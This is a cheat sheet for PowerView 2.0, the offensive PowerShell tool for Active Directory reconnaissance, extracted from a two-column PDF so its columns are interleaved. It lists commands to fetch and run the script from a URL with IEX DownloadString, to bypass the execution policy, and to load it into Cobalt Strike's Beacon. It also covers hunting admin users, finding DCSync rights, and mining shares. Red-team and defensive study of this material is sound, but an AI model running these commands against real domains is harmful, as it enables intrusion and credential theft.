Powerview

2.0 Cheat Sheet Write to .xml object …| Export-Clixml Computer Enumeration

obj.xml Get-NetComputer will enumerate computer objects on a
Read .xml object $obj = Import-Clixml given domain through LDAP, returning hostnames by
obj.xml default.
Return only live hosts -Ping
Common Cmdlet Options
Display verbose Full computer objects (not -FullData
-Verbose
status/debug information just hostnames)

Add a 10 second delay Search w/ specific LDAP -Filter
Getting Started -Delay 10
between enumerating filter "(description=*web*)"
Get PowerView: http://bit.ly/1pzQCnv
each machine Search specific domain -ADSpath
Load from disk: 1) C:\> powershell –exec bypass 2) PS ADS path (e.g. OUs) "LDAP://OU=secret, ..."
C:\> Import-Module powerview.ps1 Execute a “meta” function -Threads 15
with 15 threads Machines with -Unconstrained
Load from GitHub: PS C:\> IEX (New-Object unconstrained delegation
Net.WebClient).DownloadString(“http://bit.ly/1pzQCnv Pull information from a -Domain foreign.com
”) foreign domain. Otherwise Identifying Your Prey
functions default to the Get-NetGroup will enumerate group objects themselves
Run on non-domain joined machine: 1) configure DNS to current domain.
point to DC of domain, 2) runas /netonly on a given domain through LDAP.
/user:DOMAIN\user powershell.exe Reflect LDAP queries -DomainController Return specific name -GroupName *admin*
through a specific DC dc.domain.com results
Load in Cobalt Strike’s Beacon: beacon> powershell-
import /local/path/to/powerview.ps1 , then beacon> Execute a -ComputerName Full group objects -FullData
powershell CMDLET-NAME command/search on/for a SERVER.domain.com (Nested) groups a specific -UserName USER
specified computer.
Getting help: PS C:\> Get-Help Cmdlet-Name [-detailed] user is a member of
[-full] Many “search” cmdlets (e.g. Invoke-UserHunter) also
Get-NetGroupMember will enumerate the members of a
have additional common options:
Most PowerView functions are implemented in Empire in specific group on a given domain through LDAP.
situational_awareness/network/powerview/* Don’t ping machines -NoPing
Specified group name -GroupName “Domain
before enumerating them
Filtering and Output Admins”
File of computer names to -ComputerFile file.txt
Execute a command on … | %{…Invoke- Full user objects -FullData
enumerate
each result object Command $_ } Recursively resolve the -Recurse
Enumerate computers -ComputerFilter
Filter result objects by field … | ? {$_.Field –eq X} members of any results
found w/ specific LDAP "(description=*web*)"
Only return certain … | Select prop1,prop2 that are groups
filter
properties Get-NetUser will enumerate user objects on a given
Enumerate computers on -ComputerADSpath
Display output as a list … | fl domain through LDAP.
a specific ADS path (e.g. in "LDAP://OU=secret,..."
Display output as wrapped … | ft -wrap specific OUs) Return specific name -UserName “*john*”
table results
File of user names to -UserFile users.txt
Write out to file … | Out-File -Encoding search for Search w/ specific LDAP -Filter "(field=*term*)"
Ascii out.txt filter
Search for users w/ -UserFilter
Write to .csv … | Export-CSV - specific LDAP filter "(description=*web*)" Return users who are (or -AdminCount
NoTypeInformation were) a member of an
Only search for users on a -UserADSpath
out.csv admin protected group
specific ADS path "LDAP://OU=secret, ..."
Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.
 Users with a service -SPN Recursively map all Invoke- Misc. Functions
principal name set (likely domain trusts MapDomainTrust Search domain OUs Get-NetOU
service accounts) Find users in groups Find-ForeignUser Get all likely fileservers Get-NetFileServer
Search specific domain -ADSpath outside of the given Get shares for a specific Get-NetShare
ADS path "LDAP://OU=secret, ..." domain (outgoing access) machine X.domain.com
Find-UserField will search a specified user field/property Find groups w/ users Find-ForeignGroup Get sessions for a specific Get-NetSession
for a given term for all user objects through LDAP. outside of the given –Domain machine X.domain.com
Specify the field to search -SearchField description domain (incoming access) target.domain.com
Get logged on users for a Get-NetLoggedOn
Term to search for -SearchTerm term Enumerate local Invoke- specific machine X.domain.com
administrators in groups EnumerateLocalAdmin
User-Hunting not in the given domain -TrustGroup Get RDP sessions (and Get-NetRDPSession
Invoke-UserHunter will use LDAP queries and API calls to source IPs) X.domain.com
locate users on the domain. Note: default behavior Data Mining
Get (possibly) exploitable Get-ExploitableSystem
searches for “Domain Admins” and touches every Invoke-ShareFinder will use LDAP queries and API calls to systems
machine on the domain! search for open shares on the domain. Note: default
behavior touches every machine on the domain! Power-One-Liners
Hunt for members of a -GroupName “Web Take a GPP GUID and get all computers the local admin
specific group Admins” Only return shares the -CheckShareAccess
current user can read password is applied to: Get-NetOU -GUID {GPP_GUID} |
Show all results (i.e. don’t -ShowAll %{ Get-NetComputer -ADSPath $_ }
filter by user targets) Find-InterestingFile will recursively search a given
local/UNC path for files matching specific criteria. Find machines the current user has local admin access
Hunt using only session -Stealth on: Find-LocalAdminAccess
information from file Search a specific UNC path -Path \\SERVER\Share
Get the default domain access policy: Get-DomainPolicy
servers/DCs Only return files with the -Terms
| Select -Expand SystemAccess
Hunt for users who are -TargetServer specified search terms in term1,term2,term3
their names. See who can admin all domain controllers in the current
effective local admins for a SERVER.domain.com
domain: Get-NetDomainController | Get-NetLocalGroup
given server Only return office docs -OfficeDocs
See what objects have DCSync rights: Get-ObjectACL -
Stop on first successful -StopOnSuccess Only return files accessed -LastAccessTime (Get-
DistinguishedName "dc=domain,dc=local" -
result found within the last week. Date).AddDays(-7)
ResolveGUIDs | ? { ($_.ObjectType -match 'replication-
Domain [Trusts] Local Admin Enumeration get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
Info on the current domain Get-NetDomain Get-NetLocalGroup will enumerate the local Users with sidHistory set: Get-NetUser -Filter
Domain controllers for the Get- users/groups from localhost or a remote machine. '(sidHistory=*)'
current domain NetDomainController Enumerate local admins -ComputerName X Users with passwords > 1 year: $Date = (Get-
Info on the current forest Get-NetForest from hostname (or IP) Date).AddYears(-1).ToFileTime();Get-NetUser -Filter
List the local groups -ListGroups "(pwdlastset<=$Date)"
Enumerate all domains in Get-NetForestDomain
the current forest instead of group members Search SYSVol for common scripts: Invoke-FileFinder
Use an alternate group -GroupName "Remote –SearchSYSVol
Get all forest trusts for the Get-NetForestTrust
current forest besides local admins Desktop Users" More Information
Get all domain trusts (à la Get-NetDomainTrust Resolve and results that -Recurse http://www.harmj0y.net/blog/tag/powerview/
nltest /trusted_domains) are groups, giving a set of
http://www.verisgroup.com/adaptive-threat-division/
effective users

Created by Will Schroeder (@harmj0y) and released under the Creative Commons v3 "Attribution" License.